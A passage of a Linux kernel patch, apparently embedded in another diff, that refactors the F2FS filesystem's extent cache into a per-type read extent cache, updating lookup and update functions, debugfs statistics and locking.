+@@ -1696,7 +1696,7 @@ skip:
+ 		if (map->m_flags & F2FS_MAP_MAPPED) {
+ 			unsigned int ofs = start_pgofs - map->m_lblk;
+ 
+-			f2fs_update_extent_cache_range(&dn,
++			f2fs_update_read_extent_cache_range(&dn,
+ 				start_pgofs, map->m_pblk + ofs,
+ 				map->m_len - ofs);
+ 		}
+@@ -1741,7 +1741,7 @@ sync_out:
+ 		if (map->m_flags & F2FS_MAP_MAPPED) {
+ 			unsigned int ofs = start_pgofs - map->m_lblk;
+ 
+-			f2fs_update_extent_cache_range(&dn,
++			f2fs_update_read_extent_cache_range(&dn,
+ 				start_pgofs, map->m_pblk + ofs,
+ 				map->m_len - ofs);
+ 		}
+@@ -2202,7 +2202,7 @@ int f2fs_read_multi_pages(struct compress_ctx *cc, struct bio **bio_ret,
+ 	if (f2fs_cluster_is_empty(cc))
+ 		goto out;
+ 
+-	if (f2fs_lookup_extent_cache(inode, start_idx, &ei))
++	if (f2fs_lookup_read_extent_cache(inode, start_idx, &ei))
+ 		from_dnode = false;
+ 
+ 	if (!from_dnode)
+@@ -2636,7 +2636,7 @@ int f2fs_do_write_data_page(struct f2fs_io_info *fio)
+ 		set_new_dnode(&dn, inode, NULL, NULL, 0);
+ 
+ 	if (need_inplace_update(fio) &&
+-			f2fs_lookup_extent_cache(inode, page->index, &ei)) {
++	    f2fs_lookup_read_extent_cache(inode, page->index, &ei)) {
+ 		fio->old_blkaddr = ei.blk + page->index - ei.fofs;
+ 
+ 		if (!f2fs_is_valid_blkaddr(fio->sbi, fio->old_blkaddr,
+@@ -3361,7 +3361,7 @@ restart:
+ 	} else if (locked) {
+ 		err = f2fs_get_block(&dn, index);
+ 	} else {
+-		if (f2fs_lookup_extent_cache(inode, index, &ei)) {
++		if (f2fs_lookup_read_extent_cache(inode, index, &ei)) {
+ 			dn.data_blkaddr = ei.blk + index - ei.fofs;
+ 		} else {
+ 			/* hole case */
+@@ -3402,7 +3402,7 @@ static int __find_data_block(struct inode *inode, pgoff_t index,
+ 
+ 	set_new_dnode(&dn, inode, ipage, ipage, 0);
+ 
+-	if (f2fs_lookup_extent_cache(inode, index, &ei)) {
++	if (f2fs_lookup_read_extent_cache(inode, index, &ei)) {
+ 		dn.data_blkaddr = ei.blk + index - ei.fofs;
+ 	} else {
+ 		/* hole case */
+diff --git a/fs/f2fs/debug.c b/fs/f2fs/debug.c
+index a216dcdf69418..a9baa121d829f 100644
+--- a/fs/f2fs/debug.c
++++ b/fs/f2fs/debug.c
+@@ -72,15 +72,23 @@ static void update_general_status(struct f2fs_sb_info *sbi)
+ 	si->main_area_zones = si->main_area_sections /
+ 				le32_to_cpu(raw_super->secs_per_zone);
+ 
+-	/* validation check of the segment numbers */
++	/* general extent cache stats */
++	for (i = 0; i < NR_EXTENT_CACHES; i++) {
++		struct extent_tree_info *eti = &sbi->extent_tree[i];
++
++		si->hit_cached[i] = atomic64_read(&sbi->read_hit_cached[i]);
++		si->hit_rbtree[i] = atomic64_read(&sbi->read_hit_rbtree[i]);
++		si->total_ext[i] = atomic64_read(&sbi->total_hit_ext[i]);
++		si->hit_total[i] = si->hit_cached[i] + si->hit_rbtree[i];
++		si->ext_tree[i] = atomic_read(&eti->total_ext_tree);
++		si->zombie_tree[i] = atomic_read(&eti->total_zombie_tree);
++		si->ext_node[i] = atomic_read(&eti->total_ext_node);
++	}
++	/* read extent_cache only */
+ 	si->hit_largest = atomic64_read(&sbi->read_hit_largest);
+-	si->hit_cached = atomic64_read(&sbi->read_hit_cached);
+-	si->hit_rbtree = atomic64_read(&sbi->read_hit_rbtree);
+-	si->hit_total = si->hit_largest + si->hit_cached + si->hit_rbtree;
+-	si->total_ext = atomic64_read(&sbi->total_hit_ext);
+-	si->ext_tree = atomic_read(&sbi->total_ext_tree);
+-	si->zombie_tree = atomic_read(&sbi->total_zombie_tree);
+-	si->ext_node = atomic_read(&sbi->total_ext_node);
++	si->hit_total[EX_READ] += si->hit_largest;
++
++	/* validation check of the segment numbers */
+ 	si->ndirty_node = get_pages(sbi, F2FS_DIRTY_NODES);
+ 	si->ndirty_dent = get_pages(sbi, F2FS_DIRTY_DENTS);
+ 	si->ndirty_meta = get_pages(sbi, F2FS_DIRTY_META);
+@@ -294,10 +302,16 @@ get_cache:
+ 				sizeof(struct nat_entry_set);
+ 	for (i = 0; i < MAX_INO_ENTRY; i++)
+ 		si->cache_mem += sbi->im[i].ino_num * sizeof(struct ino_entry);
+-	si->cache_mem += atomic_read(&sbi->total_ext_tree) *
++
++	for (i = 0; i < NR_EXTENT_CACHES; i++) {
++		struct extent_tree_info *eti = &sbi->extent_tree[i];
++
++		si->ext_mem[i] = atomic_read(&eti->total_ext_tree) *
+ 						sizeof(struct extent_tree);
+-	si->cache_mem += atomic_read(&sbi->total_ext_node) *
++		si->ext_mem[i] += atomic_read(&eti->total_ext_node) *
+ 						sizeof(struct extent_node);
++		si->cache_mem += si->ext_mem[i];
++	}
+ 
+ 	si->page_mem = 0;
+ 	if (sbi->node_inode) {
+@@ -490,16 +504,18 @@ static int stat_show(struct seq_file *s, void *v)
+ 				si->bg_node_blks);
+ 		seq_printf(s, "BG skip : IO: %u, Other: %u\n",
+ 				si->io_skip_bggc, si->other_skip_bggc);
+-		seq_puts(s, "\nExtent Cache:\n");
++		seq_puts(s, "\nExtent Cache (Read):\n");
+ 		seq_printf(s, "  - Hit Count: L1-1:%llu L1-2:%llu L2:%llu\n",
+-				si->hit_largest, si->hit_cached,
+-				si->hit_rbtree);
++				si->hit_largest, si->hit_cached[EX_READ],
++				si->hit_rbtree[EX_READ]);
+ 		seq_printf(s, "  - Hit Ratio: %llu%% (%llu / %llu)\n",
+-				!si->total_ext ? 0 :
+-				div64_u64(si->hit_total * 100, si->total_ext),
+-				si->hit_total, si->total_ext);
++				!si->total_ext[EX_READ] ? 0 :
++				div64_u64(si->hit_total[EX_READ] * 100,
++				si->total_ext[EX_READ]),
++				si->hit_total[EX_READ], si->total_ext[EX_READ]);
+ 		seq_printf(s, "  - Inner Struct Count: tree: %d(%d), node: %d\n",
+-				si->ext_tree, si->zombie_tree, si->ext_node);
++				si->ext_tree[EX_READ], si->zombie_tree[EX_READ],
++				si->ext_node[EX_READ]);
+ 		seq_puts(s, "\nBalancing F2FS Async:\n");
+ 		seq_printf(s, "  - DIO (R: %4d, W: %4d)\n",
+ 			   si->nr_dio_read, si->nr_dio_write);
+@@ -566,8 +582,10 @@ static int stat_show(struct seq_file *s, void *v)
+ 			(si->base_mem + si->cache_mem + si->page_mem) >> 10);
+ 		seq_printf(s, "  - static: %llu KB\n",
+ 				si->base_mem >> 10);
+-		seq_printf(s, "  - cached: %llu KB\n",
++		seq_printf(s, "  - cached all: %llu KB\n",
+ 				si->cache_mem >> 10);
++		seq_printf(s, "  - read extent cache: %llu KB\n",
++				si->ext_mem[EX_READ] >> 10);
+ 		seq_printf(s, "  - paged : %llu KB\n",
+ 				si->page_mem >> 10);
+ 	}
+@@ -600,10 +618,15 @@ int f2fs_build_stats(struct f2fs_sb_info *sbi)
+ 	si->sbi = sbi;
+ 	sbi->stat_info = si;
+ 
+-	atomic64_set(&sbi->total_hit_ext, 0);
+-	atomic64_set(&sbi->read_hit_rbtree, 0);
++	/* general extent cache stats */
++	for (i = 0; i < NR_EXTENT_CACHES; i++) {
++		atomic64_set(&sbi->total_hit_ext[i], 0);
++		atomic64_set(&sbi->read_hit_rbtree[i], 0);
++		atomic64_set(&sbi->read_hit_cached[i], 0);
++	}
++
++	/* read extent_cache only */
+ 	atomic64_set(&sbi->read_hit_largest, 0);
+-	atomic64_set(&sbi->read_hit_cached, 0);
+ 
+ 	atomic_set(&sbi->inline_xattr, 0);
+ 	atomic_set(&sbi->inline_inode, 0);
+diff --git a/fs/f2fs/extent_cache.c b/fs/f2fs/extent_cache.c
+index 6c9e6f78a3e37..16692c96e7650 100644
+--- a/fs/f2fs/extent_cache.c
++++ b/fs/f2fs/extent_cache.c
+@@ -15,6 +15,122 @@
+ #include "node.h"
+ #include <trace/events/f2fs.h>
+ 
++bool sanity_check_extent_cache(struct inode *inode)
++{
++	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
++	struct f2fs_inode_info *fi = F2FS_I(inode);
++	struct extent_info *ei;
++
++	if (!fi->extent_tree[EX_READ])
++		return true;
++
++	ei = &fi->extent_tree[EX_READ]->largest;
++
++	if (ei->len &&
++		(!f2fs_is_valid_blkaddr(sbi, ei->blk,
++					DATA_GENERIC_ENHANCE) ||
++		!f2fs_is_valid_blkaddr(sbi, ei->blk + ei->len - 1,
++					DATA_GENERIC_ENHANCE))) {
++		set_sbi_flag(sbi, SBI_NEED_FSCK);
++		f2fs_warn(sbi, "%s: inode (ino=%lx) extent info [%u, %u, %u] is incorrect, run fsck to fix",
++			  __func__, inode->i_ino,
++			  ei->blk, ei->fofs, ei->len);
++		return false;
++	}
++	return true;
++}
++
++static void __set_extent_info(struct extent_info *ei,
++				unsigned int fofs, unsigned int len,
++				block_t blk, bool keep_clen,
++				enum extent_type type)
++{
++	ei->fofs = fofs;
++	ei->len = len;
++
++	if (type == EX_READ) {
++		ei->blk = blk;
++		if (keep_clen)
++			return;
++#ifdef CONFIG_F2FS_FS_COMPRESSION
++		ei->c_len = 0;
++#endif
++	}
++}
++
++static bool __may_read_extent_tree(struct inode *inode)
++{
++	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
++
++	if (!test_opt(sbi, READ_EXTENT_CACHE))
++		return false;
++	if (is_inode_flag_set(inode, FI_NO_EXTENT))
++		return false;
++	if (is_inode_flag_set(inode, FI_COMPRESSED_FILE) &&
++			 !f2fs_sb_has_readonly(sbi))
++		return false;
++	return S_ISREG(inode->i_mode);
++}
++
++static bool __init_may_extent_tree(struct inode *inode, enum extent_type type)
++{
++	if (type == EX_READ)
++		return __may_read_extent_tree(inode);
++	return false;
++}
++
++static bool __may_extent_tree(struct inode *inode, enum extent_type type)
++{
++	/*
++	 * for recovered files during mount do not create extents
++	 * if shrinker is not registered.
++	 */
++	if (list_empty(&F2FS_I_SB(inode)->s_list))
++		return false;
++
++	return __init_may_extent_tree(inode, type);
++}
++
++static void __try_update_largest_extent(struct extent_tree *et,
++						struct extent_node *en)
++{
++	if (et->type != EX_READ)
++		return;
++	if (en->ei.len <= et->largest.len)
++		return;
++
++	et->largest = en->ei;
++	et->largest_updated = true;
++}
++
++static bool __is_extent_mergeable(struct extent_info *back,
++		struct extent_info *front, enum extent_type type)
++{
++	if (type == EX_READ) {
++#ifdef CONFIG_F2FS_FS_COMPRESSION
++		if (back->c_len && back->len != back->c_len)
++			return false;
++		if (front->c_len && front->len != front->c_len)
++			return false;
++#endif
++		return (back->fofs + back->len == front->fofs &&
++				back->blk + back->len == front->blk);
++	}
++	return false;
++}
++
++static bool __is_back_mergeable(struct extent_info *cur,
++		struct extent_info *back, enum extent_type type)
++{
++	return __is_extent_mergeable(back, cur, type);
++}
++
++static bool __is_front_mergeable(struct extent_info *cur,
++		struct extent_info *front, enum extent_type type)
++{
++	return __is_extent_mergeable(cur, front, type);
++}
++
+ static struct rb_entry *__lookup_rb_tree_fast(struct rb_entry *cached_re,
+ 							unsigned int ofs)
+ {
+@@ -58,29 +174,6 @@ struct rb_entry *f2fs_lookup_rb_tree(struct rb_root_cached *root,
+ 	return re;
+ }
+ 
+-struct rb_node **f2fs_lookup_rb_tree_ext(struct f2fs_sb_info *sbi,
+-					struct rb_root_cached *root,
+-					struct rb_node **parent,
+-					unsigned long long key, bool *leftmost)
+-{
+-	struct rb_node **p = &root->rb_root.rb_node;
+-	struct rb_entry *re;
+-
+-	while (*p) {
+-		*parent = *p;
+-		re = rb_entry(*parent, struct rb_entry, rb_node);
+-
+-		if (key < re->key) {
+-			p = &(*p)->rb_left;
+-		} else {
+-			p = &(*p)->rb_right;
+-			*leftmost = false;
+-		}
+-	}
+-
+-	return p;
+-}
+-
+ struct rb_node **f2fs_lookup_rb_tree_for_insert(struct f2fs_sb_info *sbi,
+ 				struct rb_root_cached *root,
+ 				struct rb_node **parent,
+@@ -189,7 +282,7 @@ lookup_neighbors:
+ }
+ 
+ bool f2fs_check_rb_tree_consistence(struct f2fs_sb_info *sbi,
+-				struct rb_root_cached *root, bool check_key)
++				struct rb_root_cached *root)
+ {
+ #ifdef CONFIG_F2FS_CHECK_FS
+ 	struct rb_node *cur = rb_first_cached(root), *next;
+@@ -206,23 +299,12 @@ bool f2fs_check_rb_tree_consistence(struct f2fs_sb_info *sbi,
+ 		cur_re = rb_entry(cur, struct rb_entry, rb_node);
+ 		next_re = rb_entry(next, struct rb_entry, rb_node);
+ 
+-		if (check_key) {
+-			if (cur_re->key > next_re->key) {
+-				f2fs_info(sbi, "inconsistent rbtree, "
+-					"cur(%llu) next(%llu)",
+-					cur_re->key, next_re->key);
+-				return false;
+-			}
+-			goto next;
+-		}
+-
+ 		if (cur_re->ofs + cur_re->len > next_re->ofs) {
+ 			f2fs_info(sbi, "inconsistent rbtree, cur(%u, %u) next(%u, %u)",
+ 				  cur_re->ofs, cur_re->len,
+ 				  next_re->ofs, next_re->len);
+ 			return false;
+ 		}
+-next:
+ 		cur = next;
+ 	}
+ #endif
+@@ -237,6 +319,7 @@ static struct extent_node *__attach_extent_node(struct f2fs_sb_info *sbi,
+ 				struct rb_node *parent, struct rb_node **p,
+ 				bool leftmost)
+ {
++	struct extent_tree_info *eti = &sbi->extent_tree[et->type];
+ 	struct extent_node *en;
+ 
+ 	en = f2fs_kmem_cache_alloc(extent_node_slab, GFP_ATOMIC, false, sbi);
+@@ -250,16 +333,18 @@ static struct extent_node *__attach_extent_node(struct f2fs_sb_info *sbi,
+ 	rb_link_node(&en->rb_node, parent, p);
+ 	rb_insert_color_cached(&en->rb_node, &et->root, leftmost);
+ 	atomic_inc(&et->node_cnt);
+-	atomic_inc(&sbi->total_ext_node);
++	atomic_inc(&eti->total_ext_node);
+ 	return en;
+ }
+ 
+ static void __detach_extent_node(struct f2fs_sb_info *sbi,
+ 				struct extent_tree *et, struct extent_node *en)
+ {
++	struct extent_tree_info *eti = &sbi->extent_tree[et->type];
++
+ 	rb_erase_cached(&en->rb_node, &et->root);
+ 	atomic_dec(&et->node_cnt);
+-	atomic_dec(&sbi->total_ext_node);
++	atomic_dec(&eti->total_ext_node);
+ 
+ 	if (et->cached_en == en)
+ 		et->cached_en = NULL;
+@@ -275,61 +360,51 @@ static void __detach_extent_node(struct f2fs_sb_info *sbi,
+ static void __release_extent_node(struct f2fs_sb_info *sbi,
+ 			struct extent_tree *et, struct extent_node *en)
+ {
+-	spin_lock(&sbi->extent_lock);
++	struct extent_tree_info *eti = &sbi->extent_tree[et->type];
++
++	spin_lock(&eti->extent_lock);
+ 	f2fs_bug_on(sbi, list_empty(&en->list));
+ 	list_del_init(&en->list);
+-	spin_unlock(&sbi->extent_lock);
++	spin_unlock(&eti->extent_lock);
+ 
+ 	__detach_extent_node(sbi, et, en);
+ }
+ 
+-static struct extent_tree *__grab_extent_tree(struct inode *inode)
++static struct extent_tree *__grab_extent_tree(struct inode *inode,
++						enum extent_type type)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
++	struct extent_tree_info *eti = &sbi->extent_tree[type];
+ 	struct extent_tree *et;
+ 	nid_t ino = inode->i_ino;
+ 
+-	mutex_lock(&sbi->extent_tree_lock);
+-	et = radix_tree_lookup(&sbi->extent_tree_root, ino);
++	mutex_lock(&eti->extent_tree_lock);
++	et = radix_tree_lookup(&eti->extent_tree_root, ino);
+ 	if (!et) {
+ 		et = f2fs_kmem_cache_alloc(extent_tree_slab,
+ 					GFP_NOFS, true, NULL);
+-		f2fs_radix_tree_insert(&sbi->extent_tree_root, ino, et);
++		f2fs_radix_tree_insert(&eti->extent_tree_root, ino, et);
+ 		memset(et, 0, sizeof(struct extent_tree));
+ 		et->ino = ino;
++		et->type = type;
+ 		et->root = RB_ROOT_CACHED;
+ 		et->cached_en = NULL;
+ 		rwlock_init(&et->lock);
+ 		INIT_LIST_HEAD(&et->list);
+ 		atomic_set(&et->node_cnt, 0);
+-		atomic_inc(&sbi->total_ext_tree);
++		atomic_inc(&eti->total_ext_tree);
+ 	} else {
+-		atomic_dec(&sbi->total_zombie_tree);
++		atomic_dec(&eti->total_zombie_tree);
+ 		list_del_init(&et->list);
+ 	}
+-	mutex_unlock(&sbi->extent_tree_lock);
++	mutex_unlock(&eti->extent_tree_lock);
+ 
+ 	/* never died until evict_inode */
+-	F2FS_I(inode)->extent_tree = et;
++	F2FS_I(inode)->extent_tree[type] = et;
+ 
+ 	return et;
+ }
+ 
+-static struct extent_node *__init_extent_tree(struct f2fs_sb_info *sbi,
+-				struct extent_tree *et, struct extent_info *ei)
+-{
+-	struct rb_node **p = &et->root.rb_root.rb_node;
+-	struct extent_node *en;
+-
+-	en = __attach_extent_node(sbi, et, ei, NULL, p, true);
+-	if (!en)
+-		return NULL;
+-
+-	et->largest = en->ei;
+-	et->cached_en = en;
+-	return en;
+-}
+-
+ static unsigned int __free_extent_tree(struct f2fs_sb_info *sbi,
+ 					struct extent_tree *et)
+ {
+@@ -358,71 +433,78 @@ static void __drop_largest_extent(struct extent_tree *et,
+ 	}
+ }
+ 
+-/* return true, if inode page is changed */
+-static void __f2fs_init_extent_tree(struct inode *inode, struct page *ipage)
++void f2fs_init_read_extent_tree(struct inode *inode, struct page *ipage)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct f2fs_extent *i_ext = ipage ? &F2FS_INODE(ipage)->i_ext : NULL;
++	struct extent_tree_info *eti = &sbi->extent_tree[EX_READ];
++	struct f2fs_extent *i_ext = &F2FS_INODE(ipage)->i_ext;
+ 	struct extent_tree *et;
+ 	struct extent_node *en;
+ 	struct extent_info ei;
+ 
+-	if (!f2fs_may_extent_tree(inode)) {
+-		/* drop largest extent */
++	if (!__may_extent_tree(inode, EX_READ)) {
++		/* drop largest read extent */
+ 		if (i_ext && i_ext->len) {
+ 			f2fs_wait_on_page_writeback(ipage, NODE, true, true);
+ 			i_ext->len = 0;
+ 			set_page_dirty(ipage);
+-			return;
+ 		}
+-		return;
++		goto out;
+ 	}
+ 
+-	et = __grab_extent_tree(inode);
++	et = __grab_extent_tree(inode, EX_READ);
+ 
+ 	if (!i_ext || !i_ext->len)
+-		return;
++		goto out;
+ 
+-	get_extent_info(&ei, i_ext);
++	get_read_extent_info(&ei, i_ext);
+ 
+ 	write_lock(&et->lock);
+ 	if (atomic_read(&et->node_cnt))
+-		goto out;
++		goto unlock_out;
+ 
+-	en = __init_extent_tree(sbi, et, &ei);
++	en = __attach_extent_node(sbi, et, &ei, NULL,
++				&et->root.rb_root.rb_node, true);
+ 	if (en) {
+-		spin_lock(&sbi->extent_lock);
+-		list_add_tail(&en->list, &sbi->extent_list);
+-		spin_unlock(&sbi->extent_lock);
++		et->largest = en->ei;
++		et->cached_en = en;
++
++		spin_lock(&eti->extent_lock);
++		list_add_tail(&en->list, &eti->extent_list);
++		spin_unlock(&eti->extent_lock);
+ 	}
+-out:
++unlock_out:
+ 	write_unlock(&et->lock);
++out:
++	if (!F2FS_I(inode)->extent_tree[EX_READ])
++		set_inode_flag(inode, FI_NO_EXTENT);
+ }
+ 
+-void f2fs_init_extent_tree(struct inode *inode, struct page *ipage)
++void f2fs_init_extent_tree(struct inode *inode)
+ {
+-	__f2fs_init_extent_tree(inode, ipage);
+-
+-	if (!F2FS_I(inode)->extent_tree)
+-		set_inode_flag(inode, FI_NO_EXTENT);
++	/* initialize read cache */
++	if (__init_may_extent_tree(inode, EX_READ))
++		__grab_extent_tree(inode, EX_READ);
+ }
+ 
+-static bool f2fs_lookup_extent_tree(struct inode *inode, pgoff_t pgofs,
+-							struct extent_info *ei)
++static bool __lookup_extent_tree(struct inode *inode, pgoff_t pgofs,
++			struct extent_info *ei, enum extent_type type)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree_info *eti = &sbi->extent_tree[type];
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[type];
+ 	struct extent_node *en;
+ 	bool ret = false;
+ 
+ 	if (!et)
+ 		return false;
+ 
+-	trace_f2fs_lookup_extent_tree_start(inode, pgofs);
++	trace_f2fs_lookup_extent_tree_start(inode, pgofs, type);
+ 
+ 	read_lock(&et->lock);
+ 
+-	if (et->largest.fofs <= pgofs &&
++	if (type == EX_READ &&
++			et->largest.fofs <= pgofs &&
+ 			et->largest.fofs + et->largest.len > pgofs) {
+ 		*ei = et->largest;
+ 		ret = true;
+@@ -436,23 +518,24 @@ static bool f2fs_lookup_extent_tree(struct inode *inode, pgoff_t pgofs,
+ 		goto out;
+ 
+ 	if (en == et->cached_en)
+-		stat_inc_cached_node_hit(sbi);
++		stat_inc_cached_node_hit(sbi, type);
+ 	else
+-		stat_inc_rbtree_node_hit(sbi);
++		stat_inc_rbtree_node_hit(sbi, type);
+ 
+ 	*ei = en->ei;
+-	spin_lock(&sbi->extent_lock);
++	spin_lock(&eti->extent_lock);
+ 	if (!list_empty(&en->list)) {
+-		list_move_tail(&en->list, &sbi->extent_list);
++		list_move_tail(&en->list, &eti->extent_list);
+ 		et->cached_en = en;
+ 	}
+-	spin_unlock(&sbi->extent_lock);
++	spin_unlock(&eti->extent_lock);
+ 	ret = true;
+ out:
+-	stat_inc_total_hit(sbi);
++	stat_inc_total_hit(sbi, type);
+ 	read_unlock(&et->lock);
+ 
+-	trace_f2fs_lookup_extent_tree_end(inode, pgofs, ei);
++	if (type == EX_READ)
++		trace_f2fs_lookup_read_extent_tree_end(inode, pgofs, ei);
+ 	return ret;
+ }
+ 
+@@ -461,18 +544,20 @@ static struct extent_node *__try_merge_extent_node(struct f2fs_sb_info *sbi,
+ 				struct extent_node *prev_ex,
+ 				struct extent_node *next_ex)
+ {
++	struct extent_tree_info *eti = &sbi->extent_tree[et->type];
+ 	struct extent_node *en = NULL;
+ 
+-	if (prev_ex && __is_back_mergeable(ei, &prev_ex->ei)) {
++	if (prev_ex && __is_back_mergeable(ei, &prev_ex->ei, et->type)) {
+ 		prev_ex->ei.len += ei->len;
+ 		ei = &prev_ex->ei;
+ 		en = prev_ex;
+ 	}
+ 
+-	if (next_ex && __is_front_mergeable(ei, &next_ex->ei)) {
++	if (next_ex && __is_front_mergeable(ei, &next_ex->ei, et->type)) {
+ 		next_ex->ei.fofs = ei->fofs;
+-		next_ex->ei.blk = ei->blk;
+ 		next_ex->ei.len += ei->len;
++		if (et->type == EX_READ)
++			next_ex->ei.blk = ei->blk;
+ 		if (en)
+ 			__release_extent_node(sbi, et, prev_ex);
+ 
+@@ -484,12 +569,12 @@ static struct extent_node *__try_merge_extent_node(struct f2fs_sb_info *sbi,
+ 
+ 	__try_update_largest_extent(et, en);
+ 
+-	spin_lock(&sbi->extent_lock);
++	spin_lock(&eti->extent_lock);
+ 	if (!list_empty(&en->list)) {
+-		list_move_tail(&en->list, &sbi->extent_list);
++		list_move_tail(&en->list, &eti->extent_list);
+ 		et->cached_en = en;
+ 	}
+-	spin_unlock(&sbi->extent_lock);
++	spin_unlock(&eti->extent_lock);
+ 	return en;
+ }
+ 
+@@ -499,6 +584,7 @@ static struct extent_node *__insert_extent_tree(struct f2fs_sb_info *sbi,
+ 				struct rb_node *insert_parent,
+ 				bool leftmost)
+ {
++	struct extent_tree_info *eti = &sbi->extent_tree[et->type];
+ 	struct rb_node **p;
+ 	struct rb_node *parent = NULL;
+ 	struct extent_node *en = NULL;
+@@ -521,47 +607,50 @@ do_insert:
+ 	__try_update_largest_extent(et, en);
+ 
+ 	/* update in global extent list */
+-	spin_lock(&sbi->extent_lock);
+-	list_add_tail(&en->list, &sbi->extent_list);
++	spin_lock(&eti->extent_lock);
++	list_add_tail(&en->list, &eti->extent_list);
+ 	et->cached_en = en;
+-	spin_unlock(&sbi->extent_lock);
++	spin_unlock(&eti->extent_lock);
+ 	return en;
+ }
+ 
+-static void f2fs_update_extent_tree_range(struct inode *inode,
+-				pgoff_t fofs, block_t blkaddr, unsigned int len)
++static void __update_extent_tree_range(struct inode *inode,
++			struct extent_info *tei, enum extent_type type)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[type];
+ 	struct extent_node *en = NULL, *en1 = NULL;
+ 	struct extent_node *prev_en = NULL, *next_en = NULL;
+ 	struct extent_info ei, dei, prev;
+ 	struct rb_node **insert_p = NULL, *insert_parent = NULL;
++	unsigned int fofs = tei->fofs, len = tei->len;
+ 	unsigned int end = fofs + len;
+-	unsigned int pos = (unsigned int)fofs;
+ 	bool updated = false;
+ 	bool leftmost = false;
+ 
+ 	if (!et)
+ 		return;
+ 
+-	trace_f2fs_update_extent_tree_range(inode, fofs, blkaddr, len, 0);
+-
++	if (type == EX_READ)
++		trace_f2fs_update_read_extent_tree_range(inode, fofs, len,
++						tei->blk, 0);
+ 	write_lock(&et->lock);
+ 
+-	if (is_inode_flag_set(inode, FI_NO_EXTENT)) {
+-		write_unlock(&et->lock);
+-		return;
+-	}
++	if (type == EX_READ) {
++		if (is_inode_flag_set(inode, FI_NO_EXTENT)) {
++			write_unlock(&et->lock);
++			return;
++		}
+ 
+-	prev = et->largest;
+-	dei.len = 0;
++		prev = et->largest;
++		dei.len = 0;
+ 
+-	/*
+-	 * drop largest extent before lookup, in case it's already
+-	 * been shrunk from extent tree
+-	 */
+-	__drop_largest_extent(et, fofs, len);
++		/*
++		 * drop largest extent before lookup, in case it's already
++		 * been shrunk from extent tree
++		 */
++		__drop_largest_extent(et, fofs, len);
++	}
+ 
+ 	/* 1. lookup first extent node in range [fofs, fofs + len - 1] */
+ 	en = (struct extent_node *)f2fs_lookup_rb_tree_ret(&et->root,
+@@ -582,26 +671,30 @@ static void f2fs_update_extent_tree_range(struct inode *inode,
+ 
+ 		dei = en->ei;
+ 		org_end = dei.fofs + dei.len;
+-		f2fs_bug_on(sbi, pos >= org_end);
++		f2fs_bug_on(sbi, fofs >= org_end);
+ 
+-		if (pos > dei.fofs && pos - dei.fofs >= F2FS_MIN_EXTENT_LEN) {
+-			en->ei.len = pos - en->ei.fofs;
++		if (fofs > dei.fofs && (type != EX_READ ||
++				fofs - dei.fofs >= F2FS_MIN_EXTENT_LEN)) {
++			en->ei.len = fofs - en->ei.fofs;
+ 			prev_en = en;
+ 			parts = 1;
+ 		}
+ 
+-		if (end < org_end && org_end - end >= F2FS_MIN_EXTENT_LEN) {
++		if (end < org_end && (type != EX_READ ||
++				org_end - end >= F2FS_MIN_EXTENT_LEN)) {
+ 			if (parts) {
+-				set_extent_info(&ei, end,
+-						end - dei.fofs + dei.blk,
+-						org_end - end);
++				__set_extent_info(&ei,
++					end, org_end - end,
++					end - dei.fofs + dei.blk, false,
++					type);
+ 				en1 = __insert_extent_tree(sbi, et, &ei,
+ 							NULL, NULL, true);
+ 				next_en = en1;
+ 			} else {
+-				en->ei.fofs = end;
+-				en->ei.blk += end - dei.fofs;
+-				en->ei.len -= end - dei.fofs;
++				__set_extent_info(&en->ei,
++					end, en->ei.len - (end - dei.fofs),
++					en->ei.blk + (end - dei.fofs), true,
++					type);
+ 				next_en = en;
+ 			}
+ 			parts++;
+@@ -631,10 +724,11 @@ static void f2fs_update_extent_tree_range(struct inode *inode,
+ 		en = next_en;
+ 	}
+ 
+-	/* 3. update extent in extent cache */
+-	if (blkaddr) {
++	/* 3. update extent in read extent cache */
++	BUG_ON(type != EX_READ);
+ 
+-		set_extent_info(&ei, fofs, blkaddr, len);
++	if (tei->blk) {
++		__set_extent_info(&ei, fofs, len, tei->blk, false, EX_READ);
+ 		if (!__try_merge_extent_node(sbi, et, &ei, prev_en, next_en))
+ 			__insert_extent_tree(sbi, et, &ei,
+ 					insert_p, insert_parent, leftmost);
+@@ -664,19 +758,20 @@ static void f2fs_update_extent_tree_range(struct inode *inode,
+ }
+ 
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+-void f2fs_update_extent_tree_range_compressed(struct inode *inode,
++void f2fs_update_read_extent_tree_range_compressed(struct inode *inode,
+ 				pgoff_t fofs, block_t blkaddr, unsigned int llen,
+ 				unsigned int c_len)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[EX_READ];
+ 	struct extent_node *en = NULL;
+ 	struct extent_node *prev_en = NULL, *next_en = NULL;
+ 	struct extent_info ei;
+ 	struct rb_node **insert_p = NULL, *insert_parent = NULL;
+ 	bool leftmost = false;
+ 
+-	trace_f2fs_update_extent_tree_range(inode, fofs, blkaddr, llen, c_len);
++	trace_f2fs_update_read_extent_tree_range(inode, fofs, llen,
++						blkaddr, c_len);
+ 
+ 	/* it is safe here to check FI_NO_EXTENT w/o et->lock in ro image */
+ 	if (is_inode_flag_set(inode, FI_NO_EXTENT))
+@@ -693,7 +788,7 @@ void f2fs_update_extent_tree_range_compressed(struct inode *inode,
+ 	if (en)
+ 		goto unlock_out;
+ 
+-	set_extent_info(&ei, fofs, blkaddr, llen);
++	__set_extent_info(&ei, fofs, llen, blkaddr, true, EX_READ);
+ 	ei.c_len = c_len;
+ 
+ 	if (!__try_merge_extent_node(sbi, et, &ei, prev_en, next_en))
+@@ -704,24 +799,43 @@ unlock_out:
+ }
+ #endif
+ 
+-unsigned int f2fs_shrink_extent_tree(struct f2fs_sb_info *sbi, int nr_shrink)
++static void __update_extent_cache(struct dnode_of_data *dn, enum extent_type type)
+ {
++	struct extent_info ei;
++
